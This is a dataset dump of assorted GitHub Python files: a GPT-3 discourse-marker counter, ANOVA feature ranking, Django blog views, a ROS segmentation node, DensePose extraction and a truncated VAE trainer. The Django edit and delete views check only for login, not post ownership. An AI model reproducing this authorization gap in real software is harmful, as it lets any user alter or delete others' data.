seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
71707177064 | import openai
import csv
import argparse
from collections import Counter
from typing import List
from data.discourse_connectors import discourse_connectors
# Ihr OpenAI GPT-3 API-Schlüssel
api_key = "[insert your API KEY here]"
def parse_arguments() -> argparse.Namespace:
    """Parse the command-line arguments.

    Positional argument ``korpus`` is the path of the TSV corpus; the optional
    ``--anzahl_artikel`` flag limits how many articles are compared (default 10).
    """
    arg_parser = argparse.ArgumentParser(
        description='Vergleicht die Häufigkeit von Diskursmarkern in Artikeln und GPT-3 Texten.')
    arg_parser.add_argument('korpus', help='Pfad zum TSV-Korpus')
    arg_parser.add_argument('--anzahl_artikel', type=int, default=10,
                            help='Anzahl der zu vergleichenden Artikel')
    return arg_parser.parse_args()
def count_connectors(text: str, connectors: List[str]) -> Counter:
    """Count occurrences of each discourse connector in *text*.

    BUG FIX: the original signature was ``(text: str, connectors, List)`` — a
    comma instead of a colon turned ``List`` into a third required parameter,
    so every existing two-argument call raised TypeError.

    :param text: text to scan; it is lower-cased and split on whitespace
    :param connectors: collection of lower-case discourse connectors
    :return: Counter mapping each connector found to its frequency
    """
    vocabulary = set(connectors)  # O(1) membership tests instead of list scans
    words = text.lower().split()
    return Counter(word for word in words if word in vocabulary)
def get_gpt_text(prompt: str, token_limit: int) -> str:
    """Request a GPT-3 completion for *prompt*, capped at *token_limit* tokens.

    Uses the module-level ``api_key`` and the text-davinci-002 engine; returns
    the text of the first choice with surrounding whitespace stripped.
    """
    openai.api_key = api_key
    completion = openai.Completion.create(
        engine="text-davinci-002",
        prompt=prompt,
        max_tokens=token_limit,
    )
    first_choice = completion.choices[0]
    return first_choice.text.strip()
def trim_to_same_length(article_text: str, gpt_text: str) -> (str, str):
    """Truncate both texts to the word count of the shorter one.

    Words are whitespace-separated tokens; the trimmed texts are re-joined
    with single spaces.
    """
    article_words = article_text.split()
    gpt_words = gpt_text.split()
    limit = min(len(article_words), len(gpt_words))
    return ' '.join(article_words[:limit]), ' '.join(gpt_words[:limit])
def sum_total_connectors(counter: Counter) -> int:
    """Return the total number of discourse-connector occurrences in *counter*."""
    return sum(count for count in counter.values())
def main():
    """Compare discourse-connector frequencies between corpus articles and GPT-3 texts.

    Workflow:
      1. Parse the CLI arguments.
      2. Open the TSV corpus and read up to ``anzahl_artikel`` articles.
      3. For every article:
         a. use its first 10 sentences as the GPT-3 prompt,
         b. generate the GPT-3 continuation,
         c. trim article and generated text to the same word count,
         d. count the discourse connectors in both texts,
         e. write the results to ``output.csv``.
      4. Print the average connector counts to the terminal.
    """
    args = parse_arguments()
    article_connector_totals = []
    gpt_connector_totals = []
    # Prepare the output CSV file.
    with open('output.csv', 'w', newline='', encoding='utf-8') as csvfile:
        fieldnames = ['Head', 'Article_Connectors', 'Article_Text', 'GPT_Connectors', 'GPT_Text']
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        # Open the corpus and read the requested number of articles.
        with open(args.korpus, 'r', encoding='utf-8') as f:
            reader = csv.DictReader(f, delimiter='\t')
            for i, row in enumerate(reader):
                if i >= args.anzahl_artikel:
                    break
                article_text = row['content']
                head = row['head']
                # Use the article's first 10 sentences as the GPT-3 prompt.
                prompt = '. '.join(article_text.split('. ')[:10])
                # Cap generation roughly at the article's own length.
                token_limit = len(article_text.split())
                gpt_text = get_gpt_text(prompt, token_limit)
                # Trim both texts to the same word count for a fair comparison.
                article_text, gpt_text = trim_to_same_length(article_text, gpt_text)
                article_counts = count_connectors(article_text, discourse_connectors)
                gpt_counts = count_connectors(gpt_text, discourse_connectors)
                article_total = sum_total_connectors(article_counts)
                gpt_total = sum_total_connectors(gpt_counts)
                # Persist the per-article result.
                writer.writerow({'Head': head, 'Article_Connectors': article_total,
                                 'Article_Text': article_text, 'GPT_Connectors': gpt_total,
                                 'GPT_Text': gpt_text})
                article_connector_totals.append(article_total)
                gpt_connector_totals.append(gpt_total)
    # BUG FIX: average over the number of articles actually processed rather
    # than the requested count — the corpus may contain fewer articles, which
    # previously skewed the averages (and a 0-article run would divide by the
    # requested count instead of failing loudly).  max(..., 1) avoids a
    # ZeroDivisionError on an empty corpus.
    processed = max(len(article_connector_totals), 1)
    avg_article_total = sum(article_connector_totals) / processed
    avg_gpt_total = sum(gpt_connector_totals) / processed
    # Report the averages on the terminal.
    print(f"Durchschnittliche Diskursmarker im Artikel: {avg_article_total}")
    print(f"Durchschnittliche Diskursmarker im GPT-Text: {avg_gpt_total}")
if __name__ == '__main__':
    # Entry point when executed as a script.
    main()
"""
Output:
Durchschnittliche Diskursmarker im Artikel: 26.1
Durchschnittliche Diskursmarker im GPT-Text: 24.6
""" | SandroWick/gpt_discourseconnectives_counter | gpt_discourseconnectives_project.py | gpt_discourseconnectives_project.py | py | 4,623 | python | de | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "argparse.Namespace",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "collections.Counter",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "c... |
26610494943 | # This class implements the adaptive rank transformation used in classifier ANOVA_subset_ranking_lr
import sklearn.base as base
import scipy
import time
import logging
import torch
from utilities.optirank.ranking_multiplication import ranking_transformation
import numpy as np
import statsmodels.api as sm
from statsmodels.formula.api import ols
import pandas as pd
def calculate_F_ANOVA(X, label, dataset):
    """Per-feature F statistic for the dataset-source effect in a two-way ANOVA.

    For every feature, fit ``expr ~ C(label) + C(dataset) + C(label):C(dataset)``
    and read off the F value of the ``C(dataset)`` main effect (the larger the
    F, the greater the shift between datasets).

    :param X: n x d numpy array of observations
    :param label: n numpy array with class labels
    :param dataset: n numpy array naming the source dataset of each observation
    :return: numpy array of length d with one F value per feature
    """
    f_values = []
    n_features = X.shape[1]
    for feature_idx in range(n_features):
        frame = pd.DataFrame({"label": label, "dataset": dataset, "expr": X[:, feature_idx].flatten()})
        fitted_model = ols('expr ~ C(label) + C(dataset) + C(label):C(dataset)', data=frame).fit()
        anova_table = sm.stats.anova_lm(fitted_model, typ=2)
        f_values.append(anova_table.loc["C(dataset)", "F"])
    return np.array(f_values)
def merge_two_datasets(X, y, X_other, y_other, mask_dataset_other):
    """Combine two datasets and tag each sample with its source ("0" or "1").

    Returns ``(X, y, dataset)`` where ``dataset`` is a str numpy array marking
    every observation with "0" (primary) or "1" (secondary).  Two modes:

    * ``X_other``/``y_other`` given, ``mask_dataset_other`` None — the arrays
      are stacked into one merged dataset.
    * ``X_other``/``y_other`` None, ``mask_dataset_other`` given — both
      datasets are already mixed inside ``X``/``y``; the boolean mask marks
      the samples that belong to the secondary dataset.
    """
    if X_other is None:
        # Mode 2: the samples are already mixed; only tag them via the mask.
        dataset = np.repeat("0", len(y))
        dataset[mask_dataset_other] = "1"
        return X, y, dataset
    # Mode 1: stack the secondary dataset below the primary one.
    X_all = np.vstack([X, X_other])
    y_all = np.concatenate([y, y_other])
    dataset = np.concatenate([np.repeat("0", len(y)), np.repeat("1", len(y_other))])
    return X_all, y_all, dataset
class ANOVA_subset_ranking(base.BaseEstimator, base.TransformerMixin):
    # Selects the features least influenced by the dataset source (via a
    # two-way ANOVA dataset-effect F statistic) and rank-transforms the data
    # relative to that feature subset.

    def __init__(self, fitted=False, X=None, y=None, sum_gamma=None, perc_gamma=None, time_economy=False, X_other=None,
                 y_other=None, mask_dataset_other=None):
        """
        Transformer that selects the features that are the least influenced by the dataset source, based on a two-way
        ANOVA test that estimates the dependence of each feature on the dataset.
        To function, X, y values must be provided for two dataset sources, and the dataset effect is estimated.
        There are two modes of use:
        1) with X_other, y_other
        2) with mask_dataset_other, which indicates which samples in X, y belong to the other dataset
        These two modes permit to include (or not) the other dataset in the transformed data.
        :param fitted: whether the transformer is already fitted (used with the time_economy cache).
        :param X: n x d numpy array with data
        :param y: n numpy array with labels
        :param sum_gamma: integer indicating how many features to select as ranking reference.
        :param perc_gamma: float indicating which percentage of features to use as ranking reference.
        :param time_economy: if True, X and y are cached, and the F-values are not re-calculated for subsequent values of hyperparameter gamma.
        :param X_other: n x d numpy array with data of the secondary dataset
        :param y_other: n numpy array with labels of the secondary dataset
        :param mask_dataset_other: boolean mask that selects the "secondary dataset" samples.
        """
        super(ANOVA_subset_ranking, self).__init__()
        self.sum_gamma = sum_gamma
        self.perc_gamma = perc_gamma
        self.time_economy = time_economy
        self.fitted = fitted
        self.X = X
        self.y = y
        self.X_other = X_other
        self.y_other = y_other
        self.mask_dataset_other = mask_dataset_other

    def fit(self, X, y):
        """Estimate per-feature dataset-effect F values on the merged datasets."""
        n_genes = X.shape[1]
        # sum_gamma/perc_gamma agreement: derive the absolute count from the
        # percentage when only perc_gamma was provided.
        if self.sum_gamma is None:
            self.sum_gamma = int(self.perc_gamma * n_genes)
        if isinstance(y, list):
            y = np.array(y)
        if self.time_economy:
            start = time.time()
            # Recompute only when not fitted yet or when the cached X/y differ
            # from the new input.
            # NOTE(review): the elementwise comparison relies on numpy's
            # behavior when self.X is None — confirm it never raises here.
            if self.fitted == False or not (np.all(X == self.X)) or not (
                    np.all(y == self.y)):  # hope it doesn't throw an error when X is not fitted
                # storing X and parameters for the next cache check
                self.X = X
                self.y = y
                # calculate F values on the merged (primary + secondary) data
                X_merged, y_merged, dataset_merged = merge_two_datasets(X, y, self.X_other, self.y_other,
                                                                        self.mask_dataset_other)
                self.F_ = calculate_F_ANOVA(X_merged, y_merged, dataset_merged)
                stop = time.time()
                logging.debug('__time_economy:calculation:{}'.format(stop - start))
            else:
                # Cache hit: keep the previously computed F_ values.
                stop = time.time()
                logging.debug('__time_economy:rentability:{}'.format(stop - start))
        else:
            X_merged, y_merged, dataset_merged = merge_two_datasets(X, y, self.X_other, self.y_other,
                                                                    self.mask_dataset_other)
            self.F_ = calculate_F_ANOVA(X_merged, y_merged, dataset_merged)
        self.fitted = True
        return self

    def transform(self, X):
        """Rank-transform X with respect to the selected low-F feature subset."""
        n_genes = X.shape[1]
        # Ascending F order: small F = weakly dataset-dependent feature.
        ranking_F_indices = self.F_.argsort()
        selection_indices = ranking_F_indices[0:np.min([self.sum_gamma, n_genes])]
        # converting reference genes to binary gamma
        gamma = np.zeros(n_genes, dtype="bool")
        gamma[selection_indices] = True
        self.gamma_ = torch.Tensor(gamma)
        # ranking X_expr wrt gamma (in "avg" mode)
        X_ranked = ranking_transformation(X, self.gamma_, "avg", "d")
        return X_ranked

    def to_lightweight(self, copy=False):
        """Drop the cached data arrays to shrink the object; fitted attributes
        (F_, gamma_) are kept so transform() still works."""
        if copy:
            new_lightweight = ANOVA_subset_ranking(fitted=True, X=None, y=None, sum_gamma=self.sum_gamma,
                                                   perc_gamma=self.perc_gamma, time_economy=self.time_economy,
                                                   X_other=None, y_other=None)
            new_lightweight.gamma_ = self.gamma_
            new_lightweight.F_ = self.F_
            return new_lightweight
        else:
            self.X_other = None
            self.y_other = None
            self.X = None
            self.y = None
            return self
| paolamalsot/optirank | utilities/ANOVA_subset_ranking.py | ANOVA_subset_ranking.py | py | 6,722 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "statsmodels.formula.api.ols",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "statsmodels.api.stats.anova_lm",
"line_number": 29,
"usage_type": "call"
},
{
"api_n... |
6254269803 | from __future__ import unicode_literals
from django.shortcuts import render, get_object_or_404, redirect
from .models import Post, Tag
from .forms import PostAddForm
from django.contrib.auth.decorators import login_required
# Create your views here.
@login_required
def delete(request, post_id):
    """Delete the post with the given id (404 if absent) and return to the index."""
    post = get_object_or_404(Post, id=post_id)
    post.delete()
    return redirect('blog_app:index')
@login_required
def edit(request, post_id):
    """Edit an existing post; on a valid POST save it and show its detail page."""
    post = get_object_or_404(Post, id=post_id)
    if request.method == "POST":
        # Bind the submitted data (and uploaded files) to the existing post
        # instance, so saving updates it instead of creating a new record.
        form = PostAddForm(request.POST, request.FILES, instance=post)
        if form.is_valid():
            form.save()
            return redirect('blog_app:detail', post_id=post.id)
    else:
        form = PostAddForm(instance=post)
    # Render the edit page with the form pre-filled with the post's data
    # (also reached when a POST submission fails validation).
    return render(request, 'blog_app/edit.html', {'form': form, 'post': post})
@login_required
def add(request):
    """Create a new post owned by the logged-in user."""
    # POST: the user submitted the new-post form.
    if request.method == "POST":
        # Bind submitted fields and uploaded files (e.g. images) to the form.
        form = PostAddForm(request.POST, request.FILES)
        if form.is_valid():
            # Save with commit=False first so the owning user can be attached
            # before the post is actually written to the database.
            post = form.save(commit=False)
            post.user = request.user
            # Persist once both the content and the owner are set.
            post.save()
            return redirect('blog_app:index')
    # Any non-POST request: show an empty form.
    else:
        form = PostAddForm()
    # Render the add page with either the empty form or the invalid submission.
    return render(request, 'blog_app/add.html', {'form': form})
def detail(request, post_id):
    """Render the detail page for a single post (404 if it does not exist)."""
    post = get_object_or_404(Post, id=post_id)
    return render(request, 'blog_app/detail.html', {'post': post})
def index(request):
    """Render the index page listing all posts, newest first."""
    posts = Post.objects.all().order_by('-created_at')
return render(request, 'blog_app/index.html', {'posts': posts}) | Naoshin-hirano/blog_app | blog/blog_app/views.py | views.py | py | 2,376 | python | ja | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.get_object_or_404",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "models.Post",
"line_number": 10,
"usage_type": "argument"
},
{
"api_name": "django.shortcuts.redirect",
"line_number": 12,
"usage_type": "call"
},
{
"api_... |
41721739407 | # -*- coding:UTF-8 -*-
import numpy as np
import xlrd as xlrd
from scipy.stats import norm
import matplotlib
import matplotlib.pyplot as plt
import pandas as pd
import sys
import importlib
# 参数1 Excel文件位置 参数2 选择要作图的表格 参数3、4、5 xy轴代表含义以及标题文字 参数6列数 函数可以选择某地址文件某一个表格某一列来操作
class Make_figure:
    """Plot one column of an Excel sheet as a dashed line chart."""

    @staticmethod
    def result_pic(address, Excel_Choice, xlabel, ylabel, title, FormColumns):
        """Plot column *FormColumns* of sheet *Excel_Choice* of the workbook at *address*.

        :param address: path of the Excel file
        :param Excel_Choice: zero-based sheet index; only 0-3 are accepted
        :param xlabel: label for the x axis
        :param ylabel: label for the y axis
        :param title: figure title
        :param FormColumns: zero-based index of the column to plot
        """
        # Font setup so that CJK characters render in the figure.
        # NOTE: importlib.reload(sys) is a Python-2 encoding relic with no
        # effect on Python 3; kept so the original behavior is unchanged.
        importlib.reload(sys)
        matplotlib.rcParams['font.sans-serif'] = ['SimHei']
        plt.rcParams['font.sans-serif'] = ['SimHei']
        plt.rcParams['axes.unicode_minus'] = False
        # BUG FIX: the original if/elif chain only printed an error message for
        # an out-of-range sheet index and then crashed with a NameError because
        # `data` was never assigned.  Validate first and bail out instead.
        if Excel_Choice not in (0, 1, 2, 3):
            print('输入有误!!!')
            return
        trainFile = address
        data = pd.read_excel(trainFile, Excel_Choice)
        # x axis: running row index; y axis: values of the selected column.
        x = range(0, data.iloc[:, FormColumns].count(), 1)
        y = data.iloc[:, FormColumns]
        # Dashed blue line plus a legend entry.
        plt.plot(x, y, 'b--')
        s1 = "以太坊区块交易数"
        plt.xlabel(xlabel)
        plt.ylabel(ylabel)
        plt.title(title)
        plt.legend([s1], loc="upper left")
        plt.show()
| 357734432/Supervised-Blockchain-Simulator | Data_Output/Make_figure.py | Make_figure.py | py | 1,617 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "importlib.reload",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "matplotlib.rcParams",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_nam... |
35742603936 | #!/usr/bin/env python3
import jetson.inference
import jetson.utils
import rospy
import os
import numpy as np
import cv2
import ctypes
from sensor_msgs.msg import Image, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
class semanticSegmentation:
    """Runs jetson-inference semantic segmentation on incoming ROS image frames
    and republishes an overlay image and a binary mask image."""

    def __init__(self, topics_to, network, labels_file, camera_info):
        """
        :param topics_to: dict with 'overlay' and 'mask' output topic names
        :param network: name of the pretrained segNet model to load
        :param labels_file: path to a text file with one class label per line
        :param camera_info: sensor_msgs/CameraInfo providing frame width/height
        """
        # Create labels name list
        with open(labels_file) as labels:
            lines = labels.readlines()
            self._object_class = [label.strip() for label in lines]
        # Camera width and height
        self._CAMERA_WIDTH = camera_info.width
        self._CAMERA_HEIGHT = camera_info.height
        self._FILTER_MODE = "point"
        self._IGNORE_CLASS = "void"
        self._ALPHA = 175.0
        # Initialize network
        self._net = jetson.inference.segNet(network)
        # set the alpha blending value
        self._net.SetOverlayAlpha(self._ALPHA)
        # allocate the output images for the overlay & mask
        # (width * height * 4 channels * sizeof(float) CUDA mapped buffers)
        self._img_overlay = jetson.utils.cudaAllocMapped(self._CAMERA_WIDTH * self._CAMERA_HEIGHT * 4 * ctypes.sizeof(ctypes.c_float))
        self._img_mask = jetson.utils.cudaAllocMapped(self._CAMERA_WIDTH * self._CAMERA_HEIGHT * 4 * ctypes.sizeof(ctypes.c_float))
        self._bridge = CvBridge()
        # Create semantic segmentation overlay and mask frame publisher
        self._overlay_publisher = rospy.Publisher(topics_to['overlay'], Image, queue_size=1)
        self._mask_publisher = rospy.Publisher(topics_to['mask'], Image, queue_size=1)

    def detect(self, data):
        """ROS subscriber callback: segment one frame and publish overlay + mask."""
        # Receive frame from camera
        try:
            frame = self._bridge.imgmsg_to_cv2(data, "rgb8")
        except CvBridgeError as e:
            print(e)
        # Convert frame to RGBA (segNet expects 4-channel input here)
        rgba_frame = cv2.cvtColor(frame, cv2.COLOR_RGB2RGBA)
        # Convert frame to CUDA
        cuda_mem = jetson.utils.cudaFromNumpy(rgba_frame)
        # process the segmentation network
        self._net.Process(cuda_mem, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._IGNORE_CLASS)
        # generate the overlay and mask
        self._net.Overlay(self._img_overlay, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._FILTER_MODE)
        self._net.Mask(self._img_mask, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, self._FILTER_MODE)
        # Return frame to numpy arrray
        overlay_frame = jetson.utils.cudaToNumpy(self._img_overlay, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, 4)
        mask_frame = jetson.utils.cudaToNumpy(self._img_mask, self._CAMERA_WIDTH, self._CAMERA_HEIGHT, 4)
        # Convert RGBA frame to RGB
        overlay_frame = cv2.cvtColor(overlay_frame, cv2.COLOR_RGBA2RGB).astype(np.uint8)
        mask_frame = cv2.cvtColor(mask_frame, cv2.COLOR_RGBA2RGB).astype(np.uint8)
        # Binarize the mask: pixels whose color is exactly (220, 20, 60)
        # become white, everything else black.
        # NOTE(review): presumably (220, 20, 60) is one specific class color of
        # the model's palette — confirm against the network's color map.
        test_frame = np.zeros_like(mask_frame)
        test_frame[np.where((mask_frame==[220, 20, 60]).all(axis=2))] = (255, 255, 255)
        # Publish semantic segmentation frame
        try:
            self._overlay_publisher.publish(self._bridge.cv2_to_imgmsg(overlay_frame, encoding="rgb8"))
            self._mask_publisher.publish(self._bridge.cv2_to_imgmsg(test_frame, encoding="rgb8"))
            rospy.loginfo("Published semantic segmentation frame")
        except CvBridgeError as e:
            print(e)
def main():
    """Initialize the ROS node, load parameters, and spin the segmentation loop."""
    rospy.init_node('semantic_segmentation')
    NETWORK = rospy.get_param('network', "fcn-resnet18-cityscapes-512x256")
    LABELS_FILE = rospy.get_param('labels_file', '/home/gradproj2020/catkin_ws/src/graduation_project_simulation/scripts/semantic_segmentation/networks/FCN-ResNet18-Cityscapes-512x256/classes.txt')
    # NOTE(review): camera info is read from the *right* camera topic while the
    # image frames come from the *left* camera — confirm this is intentional.
    LEFT_CAMERA_INFO = rospy.wait_for_message('/prius/right_camera/camera_info', CameraInfo)
    os.chdir('/home/gradproj2020/catkin_ws/src/graduation_project_simulation/scripts/semantic_segmentation')
    TOPIC_FROM = "/prius/left_camera/image_raw"
    TOPICS_TO = {'overlay':"/semantic_segmentation/image_overlay",
                 'mask':"/semantic_segmentation/image_mask"}
    semantic_segmentation = semanticSegmentation(TOPICS_TO, NETWORK, LABELS_FILE, LEFT_CAMERA_INFO)
    # Large buff_size keeps the transport layer from queueing stale frames.
    rawframe_subscriber = rospy.Subscriber(TOPIC_FROM, Image, semantic_segmentation.detect, buff_size=2**24, queue_size=2)
    rate = rospy.Rate(30)
    try:
        while not rospy.is_shutdown():
            rate.sleep()
        rospy.spin()
    except rospy.ROSInterruptException:
        rospy.loginfo("Shutting down")
if __name__ == "__main__":
main()
| ZiadGhanem/Adaptive-Cruise-Control-Application | graduation_project_pkgs/graduation_project_simulation/scripts/semantic_segmentation/semantic_segmentation.py | semantic_segmentation.py | py | 4,078 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "jetson.inference.inference.segNet",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "jetson.inference.inference",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "jetson.inference",
"line_number": 29,
"usage_type": "name"
},
{
... |
37417551271 | import os
from os.path import join
import sys
import json
import numpy as np
# from .read_openpose import read_openpose
import utils.segms as segm_utils
def db_coco_extract(dataset_path, subset, out_path):
    """Extract DensePose-COCO annotations for *subset* into a single .npz file.

    Reads densepose_coco_2014_<subset>.json under <dataset_path>/annotations,
    keeps only person annotations that carry DensePose masks, and stores image
    names, person centers/scales, 2D keypoints (COCO-order and SMPL-order) and
    the raw DensePose fields in <out_path>/dp_coco_2014_<subset>.npz.
    """
    # convert joints to global order
    joints_idx = [19, 20, 21, 22, 23, 9, 8, 10, 7, 11, 6, 3, 2, 4, 1, 5, 0]
    # bbox expansion factor
    scaleFactor = 1.2
    # structs we need
    imgnames_, scales_, centers_, parts_, smpl_2dkps_, dp_annot_ = [], [], [], [], [], []
    im_id_, id_ = [], []
    # subfolders for different subsets
    subfolders = {'train': 'train2014', 'minival': 'val2014', 'valminusminival': 'val2014', 'test': 'test2014'}
    # json annotation file
    json_path = os.path.join(dataset_path,
                             'annotations',
                             'densepose_coco_2014_{}.json'.format(subset))
    json_data = json.load(open(json_path, 'r'))
    # Index the image records by id for fast file-name lookup.
    imgs = {}
    for img in json_data['images']:
        imgs[img['id']] = img
    has_dp_count = 0
    no_dp_count = 0
    for annot in json_data['annotations']:
        im_id, id = annot['image_id'], annot['id']
        # Skip annotations without DensePose masks.
        if 'dp_masks' not in annot.keys():
            # print('dp_masks not in annot')
            no_dp_count += 1
            continue
        # keypoints processing: reshape to 17 x (x, y, vis), binarize visibility
        keypoints = annot['keypoints']
        keypoints = np.reshape(keypoints, (17, 3))
        keypoints[keypoints[:, 2] > 0, 2] = 1
        # if sum(keypoints[5:, 2] > 0) < 12:
        #     no_dp_count += 1
        #     continue
        has_dp_count += 1
        # check if all major body joints are annotated
        # if sum(keypoints[5:,2]>0) < 12:
        #     continue
        # create smpl joints from coco keypoints
        smpl_2dkp = kp_coco2smpl(keypoints.copy())
        # image name (relative to the subset's image subfolder)
        image_id = annot['image_id']
        img_name = str(imgs[image_id]['file_name'])
        img_name_full = join(subfolders[subset], img_name)
        # keypoints re-ordered into the 24-joint global layout
        part = np.zeros([24, 3])
        part[joints_idx] = keypoints
        # scale and center derived from the person bounding box
        bbox = annot['bbox']
        center = [bbox[0] + bbox[2]/2, bbox[1] + bbox[3]/2]
        scale = scaleFactor*max(bbox[2], bbox[3])/200
        # raw DensePose fields kept as-is for downstream use
        dp_annot = {'bbox': annot['bbox'],
                    'dp_x': annot['dp_x'],
                    'dp_y': annot['dp_y'],
                    'dp_I': annot['dp_I'],
                    'dp_U': annot['dp_U'],
                    'dp_V': annot['dp_V'],
                    'dp_masks': annot['dp_masks']
                    }
        # store data
        imgnames_.append(img_name_full)
        centers_.append(center)
        scales_.append(scale)
        parts_.append(part)
        smpl_2dkps_.append(smpl_2dkp)
        dp_annot_.append(dp_annot)
        im_id_.append(im_id)
        id_.append(id)
    print('# samples with dp: {}; # samples without dp: {}'.format(has_dp_count, no_dp_count))
    # store the data struct
    if not os.path.isdir(out_path):
        os.makedirs(out_path)
    out_file = os.path.join(out_path, 'dp_coco_2014_{}.npz'.format(subset))
    np.savez(out_file, imgname=imgnames_,
             center=centers_,
             scale=scales_,
             part=parts_,
             smpl_2dkps=smpl_2dkps_,
             dp_annot=dp_annot_,
             im_id=im_id_,
             id=id_)
def kp_coco2smpl(kps_coco):
    """Convert 17 COCO keypoints (x, y, vis) into 24 SMPL-ordered joints (x, y, conf).

    Directly observable joints are copied from COCO; interior joints are
    synthesized as midpoints of already-known joints.  Confidence is 0.5 for
    every joint that could be derived and 0 otherwise.

    :param kps_coco: (17, 3) array of COCO keypoints, visibility in column 2
    :return: (24, 3) array of SMPL joints, confidence in column 2
    """
    joints = np.zeros((24, 4))

    # One-to-one correspondences: copy the position and use half the binary
    # visibility flag (so 0 or 0.5) as the confidence score.
    smpl_idx = [1, 2, 4, 5, 7, 8, 16, 17, 18, 19, 20, 21]
    coco_idx = [11, 12, 13, 14, 15, 16, 5, 6, 7, 8, 9, 10]
    joints[smpl_idx, :2] = kps_coco[coco_idx, :2]
    joints[smpl_idx, 3] = kps_coco[coco_idx, 2] / 2.

    def midpoint(a, b):
        # Arithmetic mean of two 2D points.
        return (a + b) / 2.

    # Joint 0: midpoint of COCO 11/12 (the hips, by COCO convention).
    if kps_coco[11, 2] > 0 and kps_coco[12, 2] > 0:
        joints[0, :2] = midpoint(kps_coco[11, :2], kps_coco[12, :2])
        joints[0, 3] = 0.5
    # Joint 12: midpoint of COCO 5/6 (the shoulders).
    if kps_coco[5, 2] > 0 and kps_coco[6, 2] > 0:
        joints[12, :2] = midpoint(kps_coco[5, :2], kps_coco[6, :2])
        joints[12, 3] = 0.5
    # Joint 15: halfway between joint 12 and COCO 0 (the nose).
    if joints[12, 3] > 0 and kps_coco[0, 2] > 0:
        joints[15, :2] = midpoint(joints[12, :2], kps_coco[0, :2])
        joints[15, 3] = 0.5
    # Joints 6 and 9: halfway between joints 0 and 12 (shared position).
    if joints[0, 3] > 0 and joints[12, 3] > 0:
        joints[6, :2] = midpoint(joints[0, :2], joints[12, :2])
        joints[9, :2] = joints[6, :2]
        joints[6, 3] = 0.5
        joints[9, 3] = 0.5
    # Joint 3: halfway between joints 0 and 6.
    if joints[0, 3] > 0 and joints[6, 3] > 0:
        joints[3, :2] = midpoint(joints[0, :2], joints[6, :2])
        joints[3, 3] = 0.5
    # Joints 13/14: halfway between joint 9 and joints 16/17 respectively.
    for derived, source in ((13, 16), (14, 17)):
        if joints[9, 3] > 0 and joints[source, 3] > 0:
            joints[derived, :2] = midpoint(joints[9, :2], joints[source, :2])
            joints[derived, 3] = 0.5
    # Hands/feet: duplicate the wrist/ankle positions onto the tip joints.
    for source, derived in ((7, 10), (8, 11), (20, 22), (21, 23)):
        if joints[source, 3] > 0:
            joints[derived, :2] = joints[source, :2]
            joints[derived, 3] = 0.5

    # Column 2 of the output carries the confidence; drop the scratch column.
    joints[:, 2] = joints[:, 3]
    return joints[:, :3].copy()
if __name__ == '__main__':
import path_config as cfg
db_coco_extract(cfg.COCO_ROOT, 'train', 'notebooks/output/extras')
# db_coco_extract(cfg.COCO_ROOT, 'minival', 'notebooks/output/extras')
| HongwenZhang/DaNet-DensePose2SMPL | datasets/preprocess/dp_coco.py | dp_coco.py | py | 5,303 | python | en | code | 208 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "json.load",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.reshape",
"line_number"... |
21577757864 | from imath.Trainer import Trainer
import torch
import imath as pt
import os
import torch.nn as nn
import numpy as np
class VAETrainer(Trainer):
    # Trainer for a VAE: encodes inputs into a Gaussian latent, applies the
    # reparameterization trick, decodes, and optimizes the reconstruction loss.

    def __init__(self, optim, lant_dim, criterion, **kwargs):
        """
        :param optim: optimizer used by the update step
        :param lant_dim: dimensionality of the (flattened) latent code
        :param criterion: reconstruction loss between input and decoded output
        """
        super(VAETrainer, self).__init__(**kwargs)
        self.lant_dim = lant_dim
        self.Distribute = self.model.Distribute
        self.Decoder = self.model.Decoder
        self.optim = optim
        self.criterion = criterion

    def forward(self, data, forward_mode, **kwargs):
        """One VAE step: encode, reparameterize, decode, then update.

        Returns {'loss': float} in 'train' mode, {'rec': tensor} otherwise.
        """
        img = data['x']
        # print('??')
        batch = img.size(0)
        distrib = self.Distribute(img)
        # Channel 0 holds the mean, channel 1 the log-variance of the latent.
        mul = distrib[:, 0:1]
        log_sig = distrib[:, 1:2]
        epi = torch.randn(batch, self.lant_dim).to(img.device)
        # print(mul.shape, log_sig.shape, epi.shape)
        # Reparameterization trick: z = mu + eps * sigma.
        z = mul + epi * torch.exp(log_sig / 2.)
        # NOTE(review): the latent is reshaped to (batch, 6, 7, 6), so lant_dim
        # is presumably 252 — confirm against the model definition.
        z = z.view((batch, 6, 7, 6))
        reconstrust = self.Decoder(z)
        # Reconstruction loss scaled by a fixed factor of 10.
        loss = self.criterion(img, reconstrust) * 10
        self.update(self.optim, loss)
        if forward_mode == 'train':
            return {'loss': loss.item()}
        else:
            return {'rec': reconstrust}

    def evaluate(self, batch_size, device, **kwargs):
        """Run evaluation batches and display a couple of reconstructions."""
        # loss = []
        for n, data in enumerate(self._evaluate(batch_size, device, **kwargs)):
            # loss.append(data['loss'])
            rec = data['rec']
